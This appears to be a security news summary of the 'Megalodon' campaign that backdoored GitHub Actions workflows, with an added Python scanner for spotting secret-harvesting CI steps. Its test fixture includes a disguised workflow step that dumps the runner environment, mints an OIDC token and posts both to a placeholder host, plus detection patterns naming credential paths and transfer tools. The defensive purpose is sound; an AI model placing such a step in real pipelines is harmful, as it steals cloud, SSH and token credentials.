Megalodon Attack: Malicious GitHub Actions Workflows Compromise Over 5,500 Open-Source Repositories
Summary
A large-scale supply chain attack campaign tracked as "Megalodon" injected malicious GitHub Actions workflows into more than 5,500 open-source repositories within a six-hour window on May 18, 2026. The attackers targeted repositories with weak branch protection and pushed backdoored CI workflow files designed to harvest secrets from every subsequent pipeline run: cloud credentials, SSH keys, API tokens, and GitHub Actions OIDC tokens. Because only the CI/CD workflow files were modified and the application code was left untouched, most affected repositories did not notice the compromise.
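The attack pattern described above (a workflow step that dumps the runner environment, mints an OIDC token, and ships both to an attacker-controlled host) is easy to triage statically once you know what to look for. The script below is an added example, not code from the article or from any affected project; the indicator patterns, the trusted-host allowlist and both sample workflows are constructed for illustration, and the collector hostname is a placeholder. It scans a workflow file line by line for credential-reading patterns (`toJSON(secrets)`, `printenv`, the `ACTIONS_ID_TOKEN_REQUEST_*` variables that mint OIDC tokens, SSH and cloud credential paths) and for outbound transfers to hosts outside the allowlist, then grades the combination.

```python
"""Static triage of GitHub Actions workflow files for secret-harvesting steps.

Added example, not from the article or any affected project. Indicator regexes,
trusted hosts and sample workflows are constructed assumptions for illustration.
"""
import re
from dataclasses import dataclass
from typing import List

@dataclass
class Finding:
    line: int     # 1-based line number in the workflow text
    kind: str     # indicator name
    detail: str   # matched text, or the external host for exfil findings

# Patterns that read credentials a runner holds. Constructed heuristics; tune per org.
HARVEST = [
    ("secrets-dump", re.compile(r"toJSON\(\s*secrets\s*\)")),
    ("env-dump", re.compile(r"\b(printenv|env\s*\||set\s*\||export\s*-p)")),
    # These two env vars are what a step uses to request an OIDC token from GitHub.
    ("oidc-mint", re.compile(r"ACTIONS_ID_TOKEN_REQUEST_(URL|TOKEN)")),
    ("ssh-key-read", re.compile(r"\.ssh/(id_[a-z0-9]+|authorized_keys|config)")),
    ("cloud-creds", re.compile(r"AWS_SECRET_ACCESS_KEY|\.aws/credentials|\.config/gcloud|AZURE_CLIENT_SECRET")),
]
# Outbound transfer tool followed by a literal URL; group 2 captures the host.
EXFIL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b[^\n]*?https?://([A-Za-z0-9.-]+)")
# Hosts a CI step legitimately talks to (assumption; extend for your registries/mirrors).
TRUSTED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com",
                 "registry.npmjs.org", "pypi.org"}

def scan_workflow(text: str) -> List[Finding]:
    """Return every harvesting or external-exfiltration indicator in a workflow file."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        for kind, pat in HARVEST:
            m = pat.search(line)
            if m:
                findings.append(Finding(n, kind, m.group(0)))
        m = EXFIL.search(line)
        if m and m.group(2) not in TRUSTED_HOSTS:
            findings.append(Finding(n, "exfil-external-host", m.group(2)))
    return findings

def verdict(findings: List[Finding]) -> str:
    """'high' = credentials read AND sent off-platform; 'medium' = one of the two; 'clean' = neither."""
    kinds = {f.kind for f in findings}
    harvest = kinds & {k for k, _ in HARVEST}
    if "exfil-external-host" in kinds and harvest:
        return "high"
    return "medium" if kinds else "clean"

# Constructed sample: an ordinary test workflow that only talks to GitHub's API.
BENIGN_WORKFLOW = """
name: ci
on: [push, pull_request]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - run: curl -sSf https://api.github.com/repos/${{ github.repository }} > /dev/null
"""

# Constructed sample: a step disguised as a cache warmup that dumps the environment,
# mints an OIDC token and posts both to a placeholder collector host.
MALICIOUS_WORKFLOW = """
name: ci
on: [push, pull_request]
permissions:
  contents: read
  id-token: write
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Cache warmup
        run: |
          printenv | base64 -w0 > /tmp/.c
          TOK=$(curl -sH "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL")
          curl -s -X POST https://telemetry.example.invalid/v1 -d "$(cat /tmp/.c)&oidc=$TOK"
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for name, wf in (("benign", BENIGN_WORKFLOW), ("malicious", MALICIOUS_WORKFLOW)):
        found = scan_workflow(wf)
        print(f"{name}: verdict={verdict(found)}")
        for f in found:
            print(f"  line {f.line}: {f.kind} ({f.detail})")
```

Run it against `.github/workflows/*.yml` in a repository's recent commit history rather than only at HEAD: the campaign's stated trick was that the workflow file looked like a routine CI change, so the diff that introduced it is the artifact to review. A "high" verdict is a reason to rotate every secret the workflow could reach and to check the cloud provider's logs for tokens minted by the repository's OIDC subject.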
Key quotes
A forged commit. A workflow file disguised as a routine CI optimization. Within 6 hours, 5,561 GitHub repositories were backdoored.
Cloud credentials harvested. SSH keys stolen. OIDC tokens minted and exfiltrated before any runner finished.
The attacker never touched your application code, only your pipeline. Most repositories had no idea it happened.
You might also wanna read
GitHub Actions workflows identified as common weak link in open source supply chain attacks
This article analyzes a series of high-profile open source supply chain security incidents from the past 18 months, tracing them back to Git
Post-mortem Analysis of @ctrl/tinycolor npm Supply Chain Attack via GitHub Actions
A detailed post-mortem analysis of a supply chain attack on the @ctrl/tinycolor npm package. The attack occurred when a malicious GitHub Act
Trivy GitHub Actions Compromised in Supply Chain Attack, Exposing CI/CD Secrets
A new supply chain attack targeting Trivy's GitHub Actions has been disclosed, where attackers compromised the security scanner by force-upd
Glassworm Threat Actor Returns with Unicode-Based Supply Chain Attacks on GitHub, npm, and VS Code
The Glassworm threat actor has returned with a new wave of supply chain attacks using invisible Unicode characters to compromise software re
Supply Chain Attacks on Open-Source Software: Case Study of Malicious Pull Request Attempts (aikido.dev)
The article discusses recent supply chain attacks on open-source software projects like LiteLLM and axios, with a specific case study of att
Postmortem: TanStack npm supply-chain compromise via GitHub Actions exploitation
On May 11, 2026, an attacker exploited a chain of vulnerabilities — including the pull_request_target "Pwn Request" pattern, GitHub Actions
